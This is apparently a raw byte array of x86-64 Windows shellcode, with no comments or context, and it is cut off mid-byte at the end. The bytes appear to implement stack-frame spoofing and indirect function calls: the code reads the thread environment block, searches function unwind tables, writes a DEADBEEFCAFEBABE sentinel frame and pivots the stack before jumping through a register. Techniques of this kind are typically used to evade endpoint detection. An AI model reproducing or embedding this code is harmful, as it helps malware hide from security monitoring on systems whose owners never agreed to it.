0x48,0x8B,0x45,0xF8,0x48,0x01,0xD0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x20,0x48,0x89,0x10,0xEB,0x18,0x48,0x8B,0x45,0x28,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0xEB,0x01,0x90,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x4C,0x8D,0x45,0xD4,0x48,0x8D,0x4D,0xD8,0x48,0x8D,0x55,0xE0,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xF3,0xFE,0xFF,0xFF,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xC8,0x00,0x00,0x00,0x48,0x8B,0x45,0xE0,0x48,0x29,0x45,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x8B,0x45,0xD4,0x89,0x45,0xF8,0xEB,0x75,0x8B,0x55,0xFC,0x8B,0x45,0xF8,0x01,0xD0,0xD1,0xE8,0x89,0x45,0xF4,0x48,0x8B,0x4D,0xD8,0x8B,0x55,0xF4,0x48,0x89,0xD0,0x48,0x01,0xC0,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x02,0x48,0x01,0xC8,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x89,0xC0,0x48,0x39,0x45,0x10,0x73,0x08,0x8B,0x45,0xF4,0x89,0x45,0xF8,0xEB,0x37,0x48,0x8B,0x45,0xE8,0x8B,0x40,0x04,0x89,0xC0,0x48,0x39,0x45,0x10,0x72,0x0B,0x8B,0x45,0xF4,0x83,0xC0,0x01,0x89,0x45,0xFC,0xEB,0x1D,0x48,0x8B,0x45,0x18,0x48,0x8B,0x55,0xE8,0x48,0x89,0x10,0x48,0x8B,0x55,0xE0,0x48,0x8B,0x45,0x20,0x48,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x3C,0x8B,0x45,0xF8,0x39,0x45,0xFC,0x72,0x83,0x48,0x8B,0x45,0xE0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0xC2,0x48,0x8D,0x05,0x9D,0xE9,0x00,0x00,0x48,0x89,0xC1,0xE8,0x75,0x1F,0x00,0x00,0x48,0x8D,0x05,0x88,0xE9,0x00,0x00,0x48,0x89,0xC1,0xE8,0x66,0x1F,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x50,0x5D,0xC3,0xB8,0x30,0x00,0x00,0x00,0x65,0x48,0x8B,0x00,0xC3,0x90,0x0F,0x0B,0x55,0x53,0x48,0x81,0xEC,0xB8,0x00,0x00,0x00,0x48,0x8D,0xAC,0x24,0xB0,0x00,0x00,0x00,0x48,0x89,0x4D,0x20,0x89,0x55,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x85,0x7C,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xA0,0x00,0x00,0x00,0x00,0xC7,0x45,0x9C,0x07,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x90,0x00,0x00,0x00,0x00,0xC7,0x45,0x8C,0x08,0x00,0x00,0x00,0x48,0xB8,0xBE,0xBA,0xFE,0xCA,0xEF,0xBE,0xAD,0xDE,0x48,0x89,0x45,0x80,0xE8,0x5A,0xFF,0xFF,0xFF,0x48,0x89,0x45,0x90,0x48,0x8B,0x45,0x90,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xA8,0x48,0x8B,0x45,0x90,0x48,0x8B,0x40,0x08,0x48,0x89,0xC1,0x48,0x8B,0x45,0x90,0x48,0x8B,0x40,0x10,0x48,0x89,0xC2,0x48,0x89,0xC8,0x48,0x29,0xD0,0x48,0x89,0x45,0xA0,0x48,0x8B,0x05,0xDE,0x69,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x40,0xDD,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD7,0x69,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xB8,0x48,0x83,0x7D,0xB8,0x00,0x0F,0x84,0xD4,0x03,0x00,0x00,0x81,0x7D,0x28,0x0F,0x2A,0x9B,0xCD,0x75,0x15,0x48,0x8D,0x95,0x7C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xB8,0x48,0x89,0xC1,0xE8,0x8D,0xEE,0xFF,0xFF,0xEB,0x14,0x48,0x8D,0x95,0x7C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xB8,0x48,0x89,0xC1,0xE8,0x9E,0xEF,0xFF,0xFF,0x90,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xF8,0x1E,0x76,0x23,0x48,0x8D,0x05,0x6C,0xE8,0x00,0x00,0x48,0x89,0xC1,0xE8,0x0A,0x1E,0x00,0x00,0x48,0x8D,0x05,0x1D,0xE8,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFB,0x1D,0x00,0x00,0xE9,0x7E,0x03,0x00,0x00,0x8B,0x95,0x7C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xB8,0x48,0x89,0xC1,0xE8,0x36,0xF8,0xFF,0xFF,0x8B,0x45,0x8C,0x0F,0xAF,0x45,0x9C,0x89,0xC3,0x48,0x8B,0x05,0x34,0x69,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x30,0x69,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xD0,0x48,0x83,0x7D,0xD0,0x00,0x0F,0x84,0x30,0x03,0x00,0x00,0x8B,0x45,0x8C,0x48,0x01,0x45,0xF0,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xEB,0x40,0x8B,0x45,0xCC,0x48,0x98,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x8B,0x80,0x40,0x07,0x00,0x00,0x85,0xC0,0x74,0x1F,0x8B,0x45,0xCC,0x48,0x98,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x8B,0x80,0x1C,0x05,0x00,0x00,0x89,0xC0,0x48,0x01,0x45,0xF0,0x83,0x45,0xCC,0x01,0x8B,0x55,0xCC,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x39,0xC2,0x72,0xB3,0x8B,0x45,0x8C,0x48,0x01,0x45,0xF0,0x8B,0x45,0x8C,0x48,0x01,0x45,0xF0,0x8B,0x45,0x8C,0x48,0x23,0x45,0xF0,0x48,0x89,0xC2,0x8B,0x45,0x8C,0x48,0x39,0xC2,0x75,0x0A,0x8B,0x45,0x8C,0x01,0xC0,0x89,0x45,0xDC,0xEB,0x06,0x8B,0x45,0x8C,0x89,0x45,0xDC,0x8B,0x45,0xDC,0x48,0x01,0x45,0xF0,0x48,0x8B,0x05,0x74,0x68,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x6C,0x68,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE0,0x48,0x83,0x7D,0xE0,0x00,0x0F,0x84,0x6F,0x02,0x00,0x00,0x48,0x8B,0x05,0x44,0x68,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xA0,0x49,0x89,0xD0,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x3C,0x68,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x42,0x02,0x00,0x00,0x48,0x8B,0x55,0xA8,0x48,0x8B,0x45,0xA0,0x48,0x01,0xD0,0x48,0x2B,0x45,0xF0,0x48,0x89,0x45,0xB0,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xEB,0x64,0x8B,0x45,0xC8,0x48,0x98,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x8B,0x80,0x40,0x07,0x00,0x00,0x85,0xC0,0x74,0x43,0x8B,0x45,0xC8,0x48,0x98,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x48,0x85,0xC0,0x74,0x24,0x8B,0x45,0xC8,0x48,0x98,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x48,0x8B,0x90,0x28,0x05,0x00,0x00,0x48,0x8B,0x45,0x20,0x48,0x89,0x50,0x48,0xEB,0x11,0x83,0x45,0xC8,0x01,0x8B,0x55,0xC8,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x39,0xC2,0x72,0x8F,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xA8,0x48,0x89,0x10,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xA0,0x48,0x89,0x50,0x08,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xE8,0x48,0x89,0x50,0x10,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xE0,0x48,0x89,0x50,0x18,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xF0,0x48,0x89,0x50,0x20,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xB0,0x48,0x89,0x50,0x28,0x48,0x8B,0x45,0x20,0x48,0x8B,0x40,0x18,0x48,0x89,0xC2,0x48,0x8B,0x45,0x20,0x48,0x8B,0x40,0x20,0x48,0x01,0xD0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x20,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xD0,0x48,0x89,0x50,0x50,0x48,0x8B,0x45,0x20,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0xDC,0x48,0x29,0xC2,0x48,0x8B,0x45,0x20,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0x20,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0x8C,0x48,0x29,0xC2,0x48,0x8B,0x45,0x20,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0x20,0x48,0x8B,0x40,0x30,0x48,0x8B,0x55,0xD0,0x48,0x89,0x10,0x48,0x8B,0x45,0x20,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0x8C,0x48,0x29,0xC2,0x48,0x8B,0x45,0x20,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0x20,0x48,0x8B,0x40,0x30,0x48,0x8B,0x55,0x80,0x48,0x89,0x10,0x48,0x8B,0x45,0x20,0x48,0x8B,0x50,0x30,0x48,0x8B,0x45,0x20,0x48,0x89,0x50,0x40,0x8B,0x95,0x7C,0xFF,0xFF,0xFF,0x48,0x8B,0x4D,0x20,0x48,0x8B,0x45,0xB8,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x54,0xF6,0xFF,0xFF,0x48,0x8B,0x45,0x20,0x48,0x8B,0x50,0x30,0x48,0x8B,0x45,0x20,0x48,0x89,0xC1,0xE8,0xE4,0xE7,0xFF,0xFF,0x48,0x8B,0x55,0x20,0x48,0x89,0x42,0x30,0x48,0x8B,0x45,0x20,0x48,0x8B,0x50,0x38,0x48,0x8B,0x45,0x20,0x48,0x89,0xC1,0xE8,0xC8,0xE7,0xFF,0xFF,0x48,0x8B,0x55,0x20,0x48,0x89,0x42,0x38,0x48,0x8B,0x45,0x20,0x48,0x8B,0x50,0x40,0x48,0x8B,0x45,0x20,0x48,0x89,0xC1,0xE8,0xAC,0xE7,0xFF,0xFF,0x48,0x8B,0x55,0x20,0x48,0x89,0x42,0x40,0xC7,0x45,0xC4,0x01,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xEB,0x2C,0x8B,0x45,0xC0,0x48,0x98,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x8B,0x80,0x40,0x07,0x00,0x00,0x85,0xC0,0x74,0x0B,0x83,0x7D,0xC4,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0x83,0x45,0xC0,0x01,0x8B,0x55,0xC0,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x39,0xC2,0x72,0xC7,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xFC,0x00,0x75,0x28,0x48,0x83,0x7D,0xE0,0x00,0x74,0x21,0x48,0x8B,0x05,0xC4,0x65,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC4,0x65,0x01,0x00,0xFF,0xD0,0x83,0x7D,0xFC,0x00,0x75,0x28,0x48,0x83,0x7D,0xE8,0x00,0x74,0x21,0x48,0x8B,0x05,0x96,0x65,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x96,0x65,0x01,0x00,0xFF,0xD0,0x83,0x7D,0xFC,0x00,0x75,0x28,0x48,0x83,0x7D,0xD0,0x00,0x74,0x21,0x48,0x8B,0x05,0x68,0x65,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xD0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x68,0x65,0x01,0x00,0xFF,0xD0,0x48,0x83,0x7D,0xB8,0x00,0x74,0x21,0x48,0x8B,0x05,0x40,0x65,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xB8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x40,0x65,0x01,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x81,0xC4,0xB8,0x00,0x00,0x00,0x5B,0x5D,0xC3,0x41,0x5B,0x48,0x31,0xC0,0x48,0x8B,0x51,0x08,0x4C,0x8B,0x41,0x10,0x4C,0x8B,0x09,0x45,0x8A,0x14,0x01,0x45,0x88,0x14,0x00,0x48,0xFF,0xC0,0x48,0x39,0xD0,0x75,0xF0,0x48,0x31,0xC0,0x4C,0x8B,0x41,0x18,0x4C,0x8B,0x49,0x28,0x48,0x8B,0x51,0x20,0x45,0x8A,0x14,0x00,0x45,0x88,0x14,0x01,0x48,0xFF,0xC0,0x48,0x39,0xD0,0x75,0xF0,0x48,0x8B,0x41,0x40,0x48,0x8B,0x40,0x08,0x48,0x8B,0x51,0x08,0x48,0x89,0x10,0x48,0x8B,0x51,0x10,0x48,0x89,0x50,0x08,0x48,0x8B,0x11,0x48,0x89,0x50,0x10,0x48,0x89,0x58,0x18,0x48,0x89,0x68,0x20,0x48,0x89,0x60,0x28,0x4C,0x89,0x58,0x30,0x48,0x31,0xC0,0x8B,0x41,0x5C,0x49,0x89,0xCA,0x83,0xF8,0x01,0x7C,0x3A,0x49,0x8B,0x4A,0x60,0x83,0xF8,0x02,0x7C,0x31,0x49,0x8B,0x52,0x68,0x83,0xF8,0x03,0x7C,0x28,0x4D,0x8B,0x42,0x70,0x83,0xF8,0x04,0x7C,0x1F,0x4D,0x8B,0x4A,0x78,0x83,0xE8,0x04,0x49,0x8B,0x6A,0x30,0x83,0xF8,0x01,0x7C,0x0F,0x49,0x8B,0x5C,0xC2,0x78,0x48,0x89,0x5C,0xC5,0x20,0x48,0xFF,0xC8,0xEB,0xEC,0x49,0x8B,0x62,0x30,0x49,0x8B,0x6A,0x38,0x41,0x8B,0x42,0x50,0x4D,0x8B,0x5A,0x48,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x55,0x57,0x53,0x48,0x81,0xEC,0xC0,0x00,0x00,0x00,0x48,0x8D,0xAC,0x24,0xC0,0x00,0x00,0x00,0x89,0x4D,0x20,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0x4C,0x89,0x4D,0x38,0xC7,0x45,0xFC,0x01,0x00,0x00,0xC0,0x48,0x8D,0x95,0x70,0xFF,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x0B,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x68,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0x30,0x48,0x89,0x85,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0x20,0x89,0xC1,0xE8,0xF1,0x76,0x00,0x00,0x48,0x89,0x45,0xD8,0x48,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x95,0x01,0x00,0x00,0x8B,0x45,0x20,0x89,0xC1,0xE8,0x7C,0x76,0x00,0x00,0x89,0x45,0xD4,0x83,0x7D,0xD4,0x00,0x0F,0x84,0x81,0x01,0x00,0x00,0x8B,0x55,0x20,0x48,0x8D,0x85,0x70,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0xE1,0xF8,0xFF,0xFF,0x89,0x45,0xD0,0x83,0x7D,0xD0,0x00,0x0F,0x84,0x65,0x01,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x0C,0x48,0x8B,0x45,0xD8,0x48,0x83,0xC0,0x02,0x48,0x89,0x45,0xF0,0x48,0x8D,0x95,0x68,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xB5,0x06,0x00,0x00,0x89,0x45,0xD0,0x83,0x7D,0xD0,0x00,0x0F,0x84,0x2D,0x01,0x00,0x00,0x48,0x8B,0x05,0x40,0x63,0x01,0x00,0xFF,0xD0,0x41,0xB8,0xB0,0x00,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x39,0x63,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x01,0x01,0x00,0x00,0x48,0x8B,0x95,0x70,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xE8,0x48,0x89,0x10,0x48,0x8B,0x95,0x78,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x08,0x48,0x8B,0x55,0x80,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x10,0x48,0x8B,0x55,0x88,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x18,0x48,0x8B,0x55,0x90,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x20,0x48,0x8B,0x55,0x98,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x28,0x48,0x8B,0x55,0xA0,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x30,0x48,0x8B,0x55,0xA8,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x38,0x48,0x8B,0x55,0xB0,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x40,0x48,0x8B,0x45,0xE8,0xC7,0x40,0x54,0x00,0x00,0x00,0x00,0xE8,0x2F,0x76,0x00,0x00,0x48,0x8B,0x55,0xE8,0x89,0x42,0x58,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x55,0xD8,0x48,0x89,0x50,0x48,0x48,0x8B,0x45,0xE8,0x8B,0x55,0xD4,0x89,0x50,0x50,0x48,0x8B,0x45,0xE8,0x8B,0x55,0x28,0x89,0x50,0x5C,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xEB,0x2B,0x48,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x48,0x8D,0x50,0x08,0x48,0x89,0x95,0x60,0xFF,0xFF,0xFF,0x48,0x8B,0x10,0x48,0x8B,0x45,0xE8,0x8B,0x4D,0xE4,0x48,0x63,0xC9,0x48,0x83,0xC1,0x0C,0x48,0x89,0x14,0xC8,0x83,0x45,0xE4,0x01,0x8B,0x45,0xE4,0x3B,0x45,0x28,0x72,0xCD,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0x0F,0xFD,0xFF,0xFF,0x89,0x45,0xFC,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xE8,0x00,0x74,0x21,0x48,0x8B,0x05,0x08,0x62,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x08,0x62,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x45,0x80,0x48,0x85,0xC0,0x74,0x21,0x48,0x8B,0x5D,0x80,0x48,0x8B,0x05,0xDA,0x61,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xDE,0x61,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x45,0x88,0x48,0x85,0xC0,0x74,0x21,0x48,0x8B,0x5D,0x88,0x48,0x8B,0x05,0xB0,0x61,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xB4,0x61,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x45,0xC0,0x48,0x85,0xC0,0x74,0x21,0x48,0x8B,0x5D,0xC0,0x48,0x8B,0x05,0x86,0x61,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x8A,0x61,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x85,0x68,0xFF,0xFF,0xFF,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x68,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0x27,0x06,0x00,0x00,0x8B,0x45,0xFC,0x48,0x81,0xC4,0xC0,0x00,0x00,0x00,0x5B,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0xC7,0x45,0xF4,0x01,0x00,0x00,0xC0,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0x1F,0x61,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x08,0x00,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x18,0x61,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x05,0xFB,0x60,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x30,0x00,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xF4,0x60,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE0,0x48,0x8B,0x05,0xD7,0x60,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x10,0x00,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD0,0x60,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xD8,0x48,0x83,0x7D,0xE8,0x00,0x74,0x0E,0x48,0x83,0x7D,0xE0,0x00,0x74,0x07,0x48,0x83,0x7D,0xD8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x8B,0x01,0x00,0x00,0x48,0x8B,0x45,0xE8,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xE0,0xC7,0x00,0x30,0x00,0x00,0x00,0x48,0x8B,0x45,0xE0,0x48,0xC7,0x40,0x08,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xE0,0x8B,0x55,0x20,0x89,0x50,0x18,0x48,0x8B,0x45,0xE0,0x48,0xC7,0x40,0x10,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xE0,0x48,0xC7,0x40,0x20,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xE0,0x48,0xC7,0x40,0x28,0x00,0x00,0x00,0x00,0x8B,0x45,0x10,0x48,0x89,0xC2,0x48,0x8B,0x45,0xD8,0x48,0x89,0x10,0x48,0x8B,0x45,0xD8,0x48,0xC7,0x40,0x08,0x00,0x00,0x00,0x00,0x8B,0x4D,0x18,0x48,0x8B,0x55,0xE8,0x48,0x8B,0x45,0xD8,0x48,0x89,0x44,0x24,0x28,0x48,0x8B,0x45,0xE0,0x48,0x89,0x44,0x24,0x20,0x41,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x04,0x00,0x00,0x00,0xB9,0x0F,0x2A,0x9B,0xCD,0xE8,0xBA,0xFB,0xFF,0xFF,0x89,0x45,0xF4,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x83,0x7D,0xF4,0x00,0x79,0x08,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0xE8,0x00,0x74,0x40,0x48,0x8B,0x45,0xE8,0x41,0xB8,0x08,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD3,0xBD,0x00,0x00,0x48,0x8B,0x05,0xC4,0x5F,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC4,0x5F,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0xE0,0x00,0x74,0x40,0x48,0x8B,0x45,0xE0,0x41,0xB8,0x30,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8C,0xBD,0x00,0x00,0x48,0x8B,0x05,0x7D,0x5F,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x7D,0x5F,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0xD8,0x00,0x74,0x40,0x48,0x8B,0x45,0xD8,0x41,0xB8,0x10,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x45,0xBD,0x00,0x00,0x48,0x8B,0x05,0x36,0x5F,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xD8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x36,0x5F,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x4C,0x89,0x4D,0x28,0x8B,0x45,0x20,0xBA,0x01,0x00,0x00,0x00,0x89,0xC1,0xD3,0xE2,0x89,0xD0,0x83,0xE8,0x01,0x89,0xC0,0x48,0x89,0x45,0xF8,0x8B,0x45,0x18,0x48,0x8B,0x55,0xF8,0x89,0xC1,0x48,0xD3,0xE2,0x48,0x89,0xD0,0x48,0xF7,0xD0,0x48,0x23,0x45,0x10,0x48,0x89,0xC2,0x8B,0x45,0x18,0x4C,0x8B,0x45,0x28,0x89,0xC1,0x49,0xD3,0xE0,0x4C,0x89,0xC0,0x48,0x09,0xD0,0x48,0x